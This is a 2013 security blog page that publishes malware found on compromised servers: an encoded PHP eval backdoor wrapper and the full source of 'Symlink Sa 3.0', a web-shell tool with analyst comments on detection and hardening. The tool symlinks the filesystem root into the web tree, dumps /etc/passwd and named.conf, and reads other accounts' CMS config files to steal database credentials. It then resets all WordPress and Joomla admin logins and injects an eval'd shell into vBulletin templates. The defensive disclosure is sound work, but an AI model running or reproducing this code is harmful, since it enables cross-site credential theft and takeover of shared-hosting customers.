Thursday, February 28, 2013

Another encoded backdoor script

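Here is one more example of an encoded backdoor script, found on a WordPress website. It is 100% malicious. If you find it anywhere on your website, remove it immediately, then check how it got there and whether other copies exist, because deleting one file does not close the hole it was uploaded through.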


<?php //password = sagov
// Analyst note: the quoted payload is unwrapped innermost-first (str_rot13, then base64_decode,
// then gzinflate) and the result is handed to eval(), so the real code never appears in the file
// as plain text. The nested eval(gzinflate(base64_decode(str_rot13( call chain is itself a useful
// search pattern when sweeping a site for copies.
// NOTE(review): "password = sagov" is presumably the login password of the decoded shell; not verifiable from this wrapper.
eval (gzinflate(base64_decode(str_rot13("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")))); ?>

Wednesday, February 27, 2013

A variant of backdoor Script

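Here is a variant of a backdoor script that I found on a Linux server. This script can be used to upload new files or edit existing ones. It also symlinks the filesystem root into a web-accessible directory so that other accounts' configuration files can be read.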

<?php


/*

  .d8888. d88888b  .o88b.         db   d8b   db      .o88b.  .d88b.  .88b  d88.
  88'  YP 88'     d8P  Y8         88   I8I   88     d8P  Y8 .8P  Y8. 88'YbdP`88
  `8bo.   88ooooo 8P              88   I8I   88     8P      88    88 88  88  88
    `Y8b. 88~~~~~ 8b      C8888D  Y8   I8I   88     8b      88    88 88  88  88
  db   8D 88.     Y8b  d8         `8b d8'8b d8' db  Y8b  d8 `8b  d8' 88  88  88
  `8888Y' Y88888P  `Y88P'          `8b8' `8d8'  VP   `Y88P'  `Y88P'  YP  YP  YP


   author..............: s3n4t00r
   home................: sec-w.com
   twitter.............: @s3n4t00r
   name tools..........: Symlink Sa v3.0

*/



// Remove the execution time limit and switch PHP error reporting off for the whole request.
set_time_limit(0);
error_reporting(0);


// $pageURL: URL of the directory this script is served from. It is the request URL with the text of
// its last "/"-separated segment removed (str_replace removes every occurrence of that text, not
// only the trailing one). The scheme is hard-coded to http and the $_SERVER values are used as-is.
$pageURL = 'http://'.$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
$u = explode("/",$pageURL );
$pageURL =str_replace($u[count($u)-1],"",$pageURL );

// $pageFTP: the same construction with an ftp:// scheme and a /public_html/ prefix; it is used
// later to build the "FTP" links in the passwd action.
$pageFTP = 'ftp://'.$_SERVER["SERVER_NAME"].'/public_html/'.$_SERVER["REQUEST_URI"];
$u = explode("/",$pageFTP );
$pageFTP =str_replace($u[count($u)-1],"",$pageFTP );

?>
  <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>Symlink_Sa 3.0</title>

<style type="text/css">

  html,body {
     margin: 0;
     padding: 0;
     outline: 0;
}
a{

 font-size: 13px;

}


body {
    direction: ltr;
    background-color:#F4F4F4;
    color: rgb(153, 153, 153);
    text-align: center
}



input,textarea,select{
font-weight: bold;
color: #000000;
}

input,textarea,select:hover{
box-shadow: 0px 0px 4px #AAAAAA;
}


.hedr {
  font-family: Tahoma, Arial, sans-serif  ;
  font-size: 22px;


}

.cont a{

 text-decoration: none;
 color:rgb(153, 153, 153);
 font-family: Tahoma, Arial, sans-serif  ;
 font-size: 16px;
 text-shadow: 0px 0px 3px ;
}

.cont a:hover{


  color: #EEEEEE ;
  text-shadow:0px 0px 3px #000000 ;


}

.tmp tr td{

border: solid 1px #BBBBBB;

padding: 2px ;
  font-size: 13px;
}

.tmp tr td a {
  text-decoration: none;



}

.foter{
  font-size: 9pt;
  color: #AAAAAA ;
  text-align: center
}

.tmp tr td:hover{

box-shadow: 0px 0px 4px #888888;

}
.fot{

font-family:Tahoma, Arial, sans-serif;

  font-size: 11pt;
}
.for a : hover{

text-shadow: 0px 0px 1px #3366FF;

}


.ir {
  color: #FF0000;
}



</style>

</head>

<body>

<div class='all'>


<?php

// Runs on every request, before any action is chosen: create a world-writable "sym" directory
// next to the script (errors suppressed with @).
@mkdir('sym',0777);
// .htaccess written into sym/. Its directives enable all Options, map .php and .html to text/plain
// and lift access restrictions (Require None / Satisfy Any) - presumably so that PHP config files
// reached through this directory are returned as source text instead of being executed.
$htcs  = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
// The fopen() result is not checked and the handle is not closed here.
$f =@fopen ('sym/.htaccess','w');
fwrite($f , $htcs);



// Link the filesystem root into the web tree as sym/root.
// Detection: a "sym" directory holding this .htaccess and a "root" symlink that points to "/".
// Hardening that blocks the technique: SymLinksIfOwnerMatch instead of FollowSymLinks, an
// AllowOverride setting that keeps .htaccess from changing Options, and symlink listed in
// disable_functions on hosts where sites do not need it.
@symlink("/","sym/root");

// File name of this script; used later as the form target and redirect location.
$pg = basename(__FILE__);

echo '<br /><div class="hedr"> Symlink Sa 3.0 <br /></div>' ;

echo '<br /><div class="hedr">-:[ User & Domains & Symlink ]:-<br /><br /></div>' ;

echo '<div class="cont">

[<a href="?"> Home </a>]

[<a href="?sws=sym"> User & Domains & Symlink </a>]

[<a href="?sws=sec"> Domains & Script </a>]

[ <a href="?sws=file"> Symlink File </a>]

[<a href="?sws=passwd"> Symlink Bypass </a>]

<br /><br />

[ <a href="?sws=read"> Bypass Read </a>]

[ <a href="?sws=joomla"> Mass Joomla </a>]

[ <a href="?sws=wp"> Mass WordPress </a>]

[ <a href="?sws=vb"> Mass vBulletin </a>]

[ <a href="?sws=help"> Help </a>]

<br /><br /><br />






</div>';

if(isset($_REQUEST['sws']))
{

switch ($_REQUEST['sws'])
{





/// Domains + Scripts  ///

case 'sec':

// Source of the domain list: a local named.txt if one exists in the script's directory, otherwise
// the server's own /etc/named.conf. named.txt is the file the 'read' action of this script writes
// from POSTed text, so its presence beside the script is an indicator of use.
// The same selection is repeated at the start of the sym, joomla, wp and vb actions.
if(!@is_file('named.txt')){

$d00m = @file("/etc/named.conf");

}else{

$d00m = @file("named.txt");


}
if(!$d00m)
{

                die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
}
else

{
echo "<div class='tmp'>
<table align='center' width='40%'><td> Domains </td><td> Script </td>";
foreach($d00m as $dom){

flush();
flush();



if(eregi("zone",$dom)){

@preg_match_all('#zone "(.*)"#', $dom, $domsws);

flush();

if(@strlen(trim($domsws[1][0])) > 2){

$user = @posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));

///////////////////////////////////////////////////////////////////////////////////

// Probe for a WordPress config under the account's web root by requesting it over HTTP through
// the sym/root symlink. get_headers() performs the request; only the status line (index 0) is
// kept and is later tested for the text "200".
// Detection: these probes appear in the web server's access log as requests for
// .../sym/root/home/<user>/public_html/wp-config.php, typically originating from the server
// itself. The same pattern repeats below for Joomla, vBulletin and WHMCS paths.
$wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/wp-config.php";
$wpp=@get_headers($wpl);
$wp=$wpp[0];

// Second candidate location: a WordPress install under /blog.
$wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/wp-config.php";
$wpp2=@get_headers($wp2);
$wp12=$wpp2[0];

///////////////////////////////

$jo1=$pageURL."/sym/root/home/".$user['name']."/public_html/configuration.php";
$joo=@get_headers($jo1);
$jo=$joo[0];


$jo2=$pageURL."/sym/root/home/".$user['name']."/public_html/joomla/configuration.php";
$joo2=@get_headers($jo2);
$jo12=$joo2[0];

////////////////////////////////

$vb1=$pageURL."/sym/root/home/".$user['name']."/public_html/includes/config.php";
$vbb=@get_headers($vb1);
$vb=$vbb[0];

$vb2=$pageURL."/sym/root/home/".$user['name']."/public_html/vb/includes/config.php";
$vbb2=@get_headers($vb2);
$vb12=$vbb2[0];

$vb3=$pageURL."/sym/root/home/".$user['name']."/public_html/forum/includes/config.php";
$vbb3=@get_headers($vb3);
$vb13=$vbb3[0];

/////////////////

$wh1=$pageURL."/sym/root/home/".$user['name']."public_html/clients/configuration.php";
$whh2= @get_headers($wh1);
$wh=$whh2[0];

$wh2=$pageURL."/sym/root/home/".$user['name']."/public_html/support/configuration.php";
$whh2= @get_headers($wh2);
$wh12=$whh2[0];

$wh3=$pageURL."/sym/root/home/".$user['name']."/public_html/client/configuration.php";
$whh3= @get_headers($wh3);
$wh13=$whh3[0];

$wh5=$pageURL."/sym/root/home/".$user['name']."/public_html/submitticket.php";
$whh5= @get_headers($wh5);
$wh15=$whh5[0];

$wh4=$pageURL."/sym/root/home/".$user['name']."/public_html/client/configuration.php";
$whh4= @get_headers($wh4);
$wh14=$whh4[0];



////////////////////////////////////////////////////////////////////////////////

 ////////// Wordpress ////////////

$pos = strpos($wp, "200");
$config="&nbsp;";

if (strpos($wp, "200") == true )
{
 $config="<a href='".$wpl."' target='_blank'>Wordpress</a>";
}
elseif (strpos($wp12, "200") == true)
{
  $config="<a href='".$wp2."' target='_blank'>Wordpress</a>";
}

///////////WHMCS////////

elseif (strpos($jo, "200")  == true and strpos($wh15, "200")  == true )
{
  $config=" <a href='".$wh5."' target='_blank'>WHMCS</a>";

}
elseif (strpos($wh12, "200")  == true)
{
  $config =" <a href='".$wh2."' target='_blank'>WHMCS</a>";
}

elseif (strpos($wh13, "200")  == true)
{
  $config =" <a href='".$wh3."' target='_blank'>WHMCS</a>";

}

///////// Joomla to 4 ///////////

elseif (strpos($jo, "200")  == true)
{
  $config=" <a href='".$jo1."' target='_blank'>Joomla</a>";
}

elseif (strpos($jo12, "200")  == true)
{
  $config=" <a href='".$jo2."' target='_blank'>Joomla</a>";
}

//////////vBulletin to 4 ///////////

elseif (strpos($vb, "200")  == true)
{
  $config=" <a href='".$vb1."' target='_blank'>vBulletin</a>";
}

elseif (strpos($vb12, "200")  == true)
{
  $config=" <a href='".$vb2."' target='_blank'>vBulletin</a>";
}

elseif (strpos($vb13, "200")  == true)
{
  $config=" <a href='".$vb3."' target='_blank'>vBulletin</a>";
}

else
{
 continue;
}
flush();
flush();

/////////////////////////////////////////////////////////////////////////////////////



$site = $user['name'] ;



flush();

echo "<tr><td><a href=http://www.".$domsws[1][0]."/>".$domsws[1][0]."</a></td>
<td>".$config."</td></tr>"; flush();

}
}
}
}




break;


/// user + domine + symlink  ///

case 'sym':

if(!is_file('named.txt')){

$d00m = @file("/etc/named.conf");

}else{

$d00m = @file("named.txt");


}
if(!$d00m)
{

                die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
}
else

{
echo "<div class='tmp'><table align='center' width='40%'><td>Domains</td><td>Users</td><td>symlink </td>";
foreach($d00m as $dom){

if(eregi("zone",$dom)){

preg_match_all('#zone "(.*)"#', $dom, $domsws);

flush();

if(strlen(trim($domsws[1][0])) > 2){

$user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));

flush();



$site = $user['name'] ;


@symlink("/","sym/root");

$site = $domsws[1][0];

$ir = 'ir';

$il = 'il';

if (preg_match("/.^$ir/",$domsws[1][0]) or preg_match("/.^$il/",$domsws[1][0]) )
{
$site = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$domsws[1][0]."</div>";
}


echo "
<tr>

<td>
<div class='dom'><a target='_blank' href=http://www.".$domsws[1][0]."/>".$site." </a> </div>
</td>


<td>
".$user['name']."
</td>






<td>
<a href='sym/root/home/".$user['name']."/public_html' target='_blank'>symlink </a>
</td>


</tr></div> ";


flush();
flush();

}
}
}
}




break;


/// file  symlink ///

case 'file':

echo'
The file path to symlink

<br /><br />
<form method="post">
<input type="text" name="file" value="/home/user/public_html/file.name" size="60"/><br /><br />
<input type="text" name="symfile" value="file.name_sym ( Ex. :: royaliste.txt )" size="60"/><br /><br />
<input type="submit" value="symlink" name="symlink" /> <br /><br />



</form>
';

// Raw POST fields from the form above: target path, link name and the submit button value.
// None of them is validated or escaped.
$pfile = $_POST['file'];
$symfile = $_POST['symfile'];
$symlink = $_POST['symlink'];

// Runs only when the form was submitted (the submit button value is non-empty).
if ($symlink)
{


// Second drop directory, sym1/, with its own .htaccess that maps .php/.html to a "txt" type and
// enables FollowSymLinks and directory indexes. Detection: a sym1 directory with this .htaccess.
@mkdir('sym1',0777);
$c  = "Options Indexes FollowSymLinks \n DirectoryIndex ssssss.htm \n AddType txt .php \n AddHandler txt .php \n  AddType txt .html \n AddHandler txt .html \n Options all \n Options \n Allow from all \n Require None \n Satisfy Any";
$f =@fopen ('sym1/.htaccess','w');
@fwrite($f , $c);

// Symlink the caller-supplied path into sym1/ under the caller-supplied name.
@symlink("$pfile","sym1/$symfile");

// The link name is echoed into the page without escaping.
echo '<br /><a target="_blank" href="sym1/'.$symfile.'" >'.$symfile.'</a>';

}



break;

/// bypass read

case 'read':

echo "read /etc/named.conf";
echo "<br /><br /><form method='post' action='?sws=read&save=1'><textarea cols='80' rows='20' name='file'>";
flush();
flush();


// Dump /etc/named.conf into the textarea opened just above.
$file = '/etc/named.conf';


// First attempt: plain fopen/fread, output HTML-escaped.
$r3ad = @fopen($file, 'r');
if ($r3ad){
$content = @fread($r3ad, @filesize($file));
echo "".htmlentities($content)."";
}
// Only fallback that can actually run: show_source() when fopen failed.
else if (!$r3ad)
{
$r3ad = @show_source($file) ;
}
// The two branches below repeat the same condition as the branch above, so they are never
// reached: highlight_file() and the symlink fallback are dead code in this sample.
else if (!$r3ad)
{
$r3ad = @highlight_file($file);
}
else if (!$r3ad)
{
$sm = @symlink($file,'sym.txt');


// NOTE(review): the link is created as 'sym.txt' but opened as 'sym/sym.txt' - the paths do not match.
if ($sm){
$r3ad = @fopen('sym/sym.txt', 'r');
$content = @fread($r3ad, @filesize($file));
echo "".htmlentities($content)."";

}
}



echo "</textarea><br /><br /><input  type='submit' value='Save'/> </form>";


// Save handler for the form above: when ?save is present, the POSTed textarea content is written
// to named.txt in the script's directory. That file then replaces /etc/named.conf as the domain
// list for the other actions. Detection: an unexpected named.txt next to a PHP file.
if(isset($_GET['save'])){


// stripcslashes() undoes backslash escapes in the submitted text; no other processing is done.
$cont = stripcslashes($_POST['file']);

// The fopen() result is not checked before writing.
$f = fopen('named.txt','w');

$w = fwrite($f,$cont);

                  if($w){

                  echo '<br />save has been successfully';

                  }

fclose($f);




}



break;

// passwd

case 'passwd':

if(isset($_GET['save']) and isset($_POST['file']) or @filesize('passwd.txt') > 0){


$cont = stripcslashes($_POST['file']);

if(!file_exists('passwd.txt')){

$f = @fopen('passwd.txt','w');

$w = @fwrite($f,$cont);

fclose($f);
}
if($w or @filesize('passwd.txt') > 0){
// * SHOW * //

echo "<div class='tmp'><table align='center' width='35%'><td>Users</td><td>symlink</td><td>FTP</td>";
flush();

$fil3 = file('passwd.txt');

foreach ($fil3 as $f){

     $u=explode(':', $f);
     $user = $u['0'];



echo "
<tr>



<td width='15%'>
$user
</td>






<td width='10%'>
<a href='sym/root/home/$user/public_html' target='_blank'>Symlink </a>
</td>

<td width='10%'>
<a href='$pageFTP/sym/root/home/$user/public_html' target='_blank'>FTP</a>
</td>



</tr></div> ";


flush();
flush();


}






die ("</tr></div>");


                  }





}



echo "read /etc/passwd";
echo "<br /><br /><form method='post' action='?sws=passwd&save=1'><textarea cols='80' rows='20' name='file'>";
flush();

$file = '/etc/passwd';


// Dump the file named by $file (set to '/etc/passwd' just above) into the open textarea.
// First attempt: plain fopen/fread, output HTML-escaped.
$r3ad = @fopen($file, 'r');
if ($r3ad){
$content = @fread($r3ad, @filesize($file));
echo "".htmlentities($content)."";
}
// Only fallback that can actually run: show_source() when fopen failed.
elseif(!$r3ad)
{
$r3ad = @show_source($file) ;
}
// Same condition as the branch above, so this branch and the next are never reached.
elseif(!$r3ad)
{
$r3ad = @highlight_file($file);
}
elseif(!$r3ad)
{

                                            // Unreached fallback: rebuild passwd-style lines by asking
                                            // posix_getpwuid() for every UID from 0 to 999.
                                            // each() no longer exists in PHP 8.
                                            for($uid=0;$uid<1000;$uid++){
                                             $ara = posix_getpwuid($uid);
                                               if (!empty($ara)) {
                                                  while (list ($key, $val) = each($ara)){
                                                    print "$val:";
                                                  }
                                                  print "\n";
                                                 }

                                        }

 }


flush();


echo "</textarea><br /><br /><input  type='submit' value='&nbsp;&nbsp;symlink&nbsp;&nbsp;'/> </form>";
flush();

break;



case 'joomla':

/////////////////////////////////////////////////////////////////// xxxxxxxxxxxxxxxxxxx ////////////////////////////


if(isset($_POST['s'])){

$file = @file_get_contents('joomla.txt');

$ex   = explode("\n",$file);

echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";
flush();


foreach ($ex as $exp){

$es   = explode("||",$exp);

$config = $es[0];

$domin = $es[1];

$domins = trim($domin).'';

$readconfig  = @file_get_contents(trim($config));

if(ereg('JConfig',$readconfig)){



// Pull the database password, user, name and table prefix out of the Joomla configuration source
// that was fetched as text; ex() returns the text between the two markers.
$pass    =  ex($readconfig,'$password = \'',"';");

$userdb  =  ex($readconfig,'$user = \'',"';");

$db      =  ex($readconfig,'$db = \'',"';");

$fix     =  ex($readconfig,'$dbprefix = \'',"';");

// Name of the Joomla users table for this install.
$tab     =  $fix.'users';


// Connect to MySQL on localhost with the site's own credentials. The mysql_* functions used here
// were removed in PHP 7. $db is overwritten with the boolean result of mysql_select_db().
$con     = @mysql_connect('localhost',$userdb,$pass);

$db      = @mysql_select_db($db,$con);

// Neither UPDATE has a WHERE clause, so every row of the users table gets the same username and
// the same fixed password hash.
// Indicator of compromise: all accounts named 'sec-w.com' and sharing one password value.
// Recovery needs a database restore or a reset of every account, plus new database credentials,
// since the config file that held them was readable.
$query   = @mysql_query("UPDATE `$tab`  SET `username` ='sec-w.com'");


$query3  = @mysql_query("UPDATE `$tab`  SET `password` ='44a0bcda611514625ba94e0b1c0bdaed:2iets9ydjR3iOdSuyvW54pIzyF9M1P5J'");


// Result cell for the table row: success only if both queries returned a truthy value.
if ($query and $query3 ){$r = '<b style="color: #006600">Succeed </b>user [sec-w.com] pass [1]</b>';}else{$r = '<b style="color:red">failed</b>';}

$domins = trim($domin).'';

echo "<tr>
<td><a target='_blank' href='http://$domins'>$domin</a></td>
<td><a target='_blank' href='$config'>config</a></td><td>".$r."</td></tr>";
flush();



}else{

echo "<tr>
<td><a target='_blank' href='http://$domins'>$domin</a></td>
<td><a target='_blank' href='http://$exp'>config</a></td><td><b style='color:red'>failed</b></td></tr>";
flush();

}

}









die();

}

if(!is_file('named.txt')){

$d00m = @file("/etc/named.conf");

flush();


}else{

$d00m = file("named.txt");


}
if(!$d00m)
{

                die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
}
else

{
echo "<div class='tmp'>
<form method='POST' action='$pg?sws=joomla'>
<input type='submit' value='Mass ching Admin' />
<input type='hidden' value='1' name='s' />
</form><br /><br />
<table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";

$f = fopen('joomla.txt','w');

foreach($d00m as $dom){

if(eregi("zone",$dom)){

preg_match_all('#zone "(.*)"#', $dom, $domsws);

if(strlen(trim($domsws[1][0])) > 2){

$user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));

///////////////////////////////////////////////////////////////////////////////////

$wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/configuration.php";
$wpp=get_headers($wpl);
$wp=$wpp[0];

$wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/configuration.php";
$wpp2=get_headers($wp2);
$wp12=$wpp2[0];

$wp3=$pageURL."/sym/root/home/".$user['name']."/public_html/joomla/configuration.php";
$wpp3=get_headers($wp3);
$wp13=$wpp3[0];


 ////////// joomla ////////////

$pos = strpos($wp, "200");
$config="&nbsp;";

if (strpos($wp, "200") == true )
{
 $config= $wpl;
}
elseif (strpos($wp12, "200") == true)
{
  $config= $wp2;
}
elseif (strpos($wp13, "200") == true)
{
  $config= $wp3;
}
else
{
continue;

}
flush();

/////////////////////////////////////////////////////////////////////////////////////

$dom = $domsws[1][0];

$w = fwrite($f,"$config||$dom \n");
if($w){$r = '<b style="color: #006600">Save</b>';}else{$r = '<b style="color:red">failed</b>';}


echo "<tr><td><a href=http://www.".$domsws[1][0].">".$domsws[1][0]."</a></td>
<td><a href='$config'>config</a></td><td>".$r."</td></tr>";





flush();


}
}
}
}


break;

case 'wp':

############################ index #########################3






########  admin ##########33

if(isset($_POST['s'])){

$file = @file_get_contents('wp.txt');

$ex   = explode("\n",$file);

echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";
flush();
flush();


foreach ($ex as $exp){

$es   = explode("||",$exp);

$config = $es[0];

$domin = $es[1];

$domins = trim($domin).'';

$readconfig  = @file_get_contents(trim($config));

if(ereg('wp-settings.php',$readconfig)){



// Pull DB_PASSWORD, DB_USER, DB_NAME and the table prefix out of the wp-config.php source that was
// fetched as text; ex() returns the text between the two markers.
$pass    =  ex($readconfig,"define('DB_PASSWORD', '","');");

$userdb  =  ex($readconfig,"define('DB_USER', '","');");

$db      =  ex($readconfig,"define('DB_NAME', '","');");

$fix     =  ex($readconfig,'$table_prefix  = \'',"';");

// Name of the WordPress users table for this install.
$tab     = $fix.'users';

// Connect to MySQL on localhost with the site's own credentials (mysql_* was removed in PHP 7).
// $db is overwritten with the boolean result of mysql_select_db().
$con     = @mysql_connect('localhost',$userdb,$pass);

$db      = @mysql_select_db($db,$con);

// Neither UPDATE has a WHERE clause, so every row of the users table gets the same login and the
// same fixed password hash. "or die" ends the whole script silently if either query fails.
// Indicator of compromise: all accounts with user_login 'sec-w.com' and an identical user_pass.
// Recovery needs a database restore or a reset of every account, plus new database credentials.
$query   = @mysql_query("UPDATE `$tab` SET `user_login` ='sec-w.com'") or die;

$query   = @mysql_query("UPDATE `$tab` SET `user_pass` ='$1$4z/.5i..$9aHYB.fUHEmNZ.eIKYTwx/'") or die;



// $query holds only the second query's result; because of "or die" above it is truthy whenever
// execution reaches this line.
if ($query){$r = '<b style="color: #006600">Succeed </b>user [sec-w.com] pass [1]</b>';}

else

{

$r = '<b style="color:red">failed</b>';

}

$domins = trim($domin).'';

echo "<tr>
<td><a target='_blank' href='http://$domins'>$domin</a></td>
<td><a target='_blank' href='$config'>config</a></td><td>".$r."</td></tr>";

flush();
flush();






}else{

echo "<tr>
<td><a target='_blank' href='http://$domins'>$domin</a></td>
<td><a target='_blank' href='http://$config'>config</a></td><td><b style='color:red'>failed2</b></td></tr>";

flush();
flush();

}

}










die();

}

if(!is_file('named.txt')){

$d00m = @file("/etc/named.conf");

}else{

$d00m = @file("named.txt");


}
if(!$d00m)
{

                die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
}
else

{
echo "<div class='tmp'>
<form method='POST' action='$pg?sws=wp'>
<input type='submit' value='Mass Change Admin' />
<input type='hidden' value='1' name='s' />
</form>
<br /><br />
<table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";

flush();
flush();

$f = fopen('wp.txt','w');

foreach($d00m as $dom){

if(eregi("zone",$dom)){

preg_match_all('#zone "(.*)"#', $dom, $domsws);

if(strlen(trim($domsws[1][0])) > 2){

$user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));

///////////////////////////////////////////////////////////////////////////////////

$wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/wp-config.php";
$wpp=get_headers($wpl);
$wp=$wpp[0];

$wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/wp-config.php";
$wpp2=get_headers($wp2);
$wp12=$wpp2[0];

$wp3=$pageURL."/sym/root/home/".$user['name']."/public_html/wp/wp-config";
$wpp3=get_headers($wp3);
$wp13=$wpp3[0];


 ////////// wp ////////////

$pos = strpos($wp, "200");
$config="&nbsp;";

if (strpos($wp, "200") == true )
{
 $config= $wpl;
}
elseif (strpos($wp12, "200") == true)
{
  $config= $wp2;
}
elseif (strpos($wp13, "200") == true)
{
  $config= $wp3;
}
else
{
continue;

}
flush();

/////////////////////////////////////////////////////////////////////////////////////

$dom = $domsws[1][0];

$w = fwrite($f,"$config||$dom \n");
if($w){$r = '<b style="color: #006600">Save</b>';}else{$r = '<b style="color:red">failed</b>';}


echo "<tr><td><a href=http://www.".$domsws[1][0].">".$domsws[1][0]."</a></td>
<td><a href='$config'>config</a></td><td>".$r."</td></tr>";
flush();
flush();





flush();


}
}
}
}


break;


case 'vb':


if(isset($_POST['s'])){



$file = @file_get_contents('vb.txt');

$ex   = explode("\n",$file);

echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";


foreach ($ex as $exp){

$es   = explode("||",$exp);

$config = $es[0];

$domin = $es[1];

$domins = trim($domin).'';

$readconfig  = @file_get_contents(trim($config));

if(ereg('vBulletin',$readconfig)){



// Pull the database name, user and password out of the vBulletin config source that was fetched
// as text; ex() returns the text between the two markers.
$db      =  ex($readconfig,'$config[\'Database\'][\'dbname\'] = \'',"';");

$userdb  =  ex($readconfig,'$config[\'MasterServer\'][\'username\'] = \'',"';");

$pass    =  ex($readconfig,'$config[\'MasterServer\'][\'password\'] = \'',"';");

// Connect to MySQL on localhost with the forum's own credentials (mysql_* was removed in PHP 7).
$con     = @mysql_connect('localhost',$userdb,$pass);

$db      = @mysql_select_db($db,$con);

// Opaque base64 blob carried by the tool; its contents are not decoded in this review.
$shell   = "bVDPS8MwFL4L/g+vYZAWdPPiaUv14kAQFKqnUUqapjSYNKFJxCn7322abgzcIfDyvl+P7/qKs04D3tS5sJ96MMJ9b+ohDw8vTWcq31PF02yJp/WqzvEaZk2rBwWUOaF7ghAo7jrdEGS0dQh4z9zecIKUl04YOrhV4N821FEEwZQgb6SmDR8QiObsdxYheuMdRKNWSH5UxtmKn3G+v0P5TIxgNTqhWWR9rYSLAXH/RaUfgY8pbVROZ4VI0aawqN5ei/cdDlRcAiFwJEIGv4HyyLTZp4tq+/zyVOxwOASXO+yUqUI6Lm/gHxiBLDic6o62UHjGuLWQJEko99T9Gg7ApeUXJFsq5EX+AR7yPw==" ;

// The blob is wrapped in an eval(gzinflate(base64_decode(...))) expression written in template
// variable syntax, so the code would run when the forum renders the template.
$crypt  = "{\${eval(gzinflate(base64_decode(\'";

$crypt .= "$shell";

$crypt .= "\')))}}{\${exit()}}</textarea>";

// The forum's template row titled 'FAQ' is overwritten with that string.
// Detection: query the template table for rows whose content contains eval( or base64_decode.
// Recovery: restore the affected templates from a clean copy and rotate the database credentials.
$sqlfaq = "UPDATE template SET template ='".$crypt."' WHERE title ='FAQ'" ;

$query  = @mysql_query($sqlfaq,$con);



// Result cell for the table row; the tool's own message points at search.php.
if ($query){$r = '<b style="color: #006600">Succeed</b> shell in search.php';}

else

{

$r = '<b style="color:red">failed</b>';

}

$domins = trim($domin).'';

echo "<tr>
<td><a target='_blank' href='http://$domins'>$domin</a></td>
<td><a target='_blank' href='$config'>config</a></td><td>".$r."</td></tr>";







}else{

echo "<tr>
<td><a target='_blank' href='http://$domins'>$domin</a></td>
<td><a target='_blank' href='http://$config'>config</a></td><td><b style='color:red'>failed2</b></td></tr>";
}

}










die();

}

if(!is_file('named.txt')){

$d00m = file("/etc/named.conf");

}else{

$d00m = file("named.txt");


}
if(!$d00m)
{

                die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
}
else

{
echo "<div class='tmp'>
<form method='POST' action='$pg?sws=vb'>
<input type='submit' value='Inject shell' />
<input type='hidden' value='1' name='s' />
</form>
<br /><br />
<table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";

$f = fopen('vb.txt','w');

foreach($d00m as $dom){

if(eregi("zone",$dom)){

preg_match_all('#zone "(.*)"#', $dom, $domsws);

if(strlen(trim($domsws[1][0])) > 2){

$user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));

///////////////////////////////////////////////////////////////////////////////////

$wpl=$pageURL."/sym/root/home/".$user['name']."/includes/config.php";
$wpp=get_headers($wpl);
$wp=$wpp[0];

$wp2=$pageURL."/sym/root/home/".$user['name']."/vb/includes/config.php";
$wpp2=get_headers($wp2);
$wp12=$wpp2[0];

$wp3=$pageURL."/sym/root/home/".$user['name']."/forum/includes/config.php";
$wpp3=get_headers($wp3);
$wp13=$wpp3[0];


 ////////// vb ////////////

$pos = strpos($wp, "200");
$config="&nbsp;";

if (strpos($wp, "200") == true )
{
 $config= $wpl;
}
elseif (strpos($wp12, "200") == true)
{
  $config= $wp2;
}
elseif (strpos($wp13, "200") == true)
{
  $config= $wp3;
}
else
{
continue;

}
flush();

/////////////////////////////////////////////////////////////////////////////////////

$dom = $domsws[1][0];

$w = fwrite($f,"$config||$dom \n");
if($w){$r = '<b style="color: #006600">Save</b>';}else{$r = '<b style="color:red">failed</b>';}


echo "<tr><td><a href=http://www.".$domsws[1][0].">".$domsws[1][0]."</a></td>
<td><a href='$config'>config</a></td><td>".$r."</td></tr>";





flush();


}
}
}
}








break;

case 'help':

echo "<div class='tmp'>
<table align='center' width='40%'><td>function</td><td>Case</td>";


// Environment report: each check sets $r to a red "False" or green "True" label and prints a row.
// For safe_mode the label is "False" when safe_mode is ON, i.e. the column reads as
// "usable by the tool" rather than as the setting's value.
$safe_mode = ini_get('safe_mode');
     if($safe_mode){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}

echo "<tr><td>Safe Mode</td><td>$r</td>";

// The functions tested below are the ones the tool depends on (symlink, file, file_get_contents,
// mkdir); the list is a reasonable starting point when reviewing disable_functions on shared hosts.
$fun = function_exists('symlink');
     if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}

echo "<tr><td>function symlink</td><td>$r</td>";


$fun = function_exists('file');
     if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}

echo "<tr><td>function file</td><td>$r</td>";

$fun = function_exists('file_get_contents');
     if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}

echo "<tr><td>function file_get_contents</td><td>$r</td>";

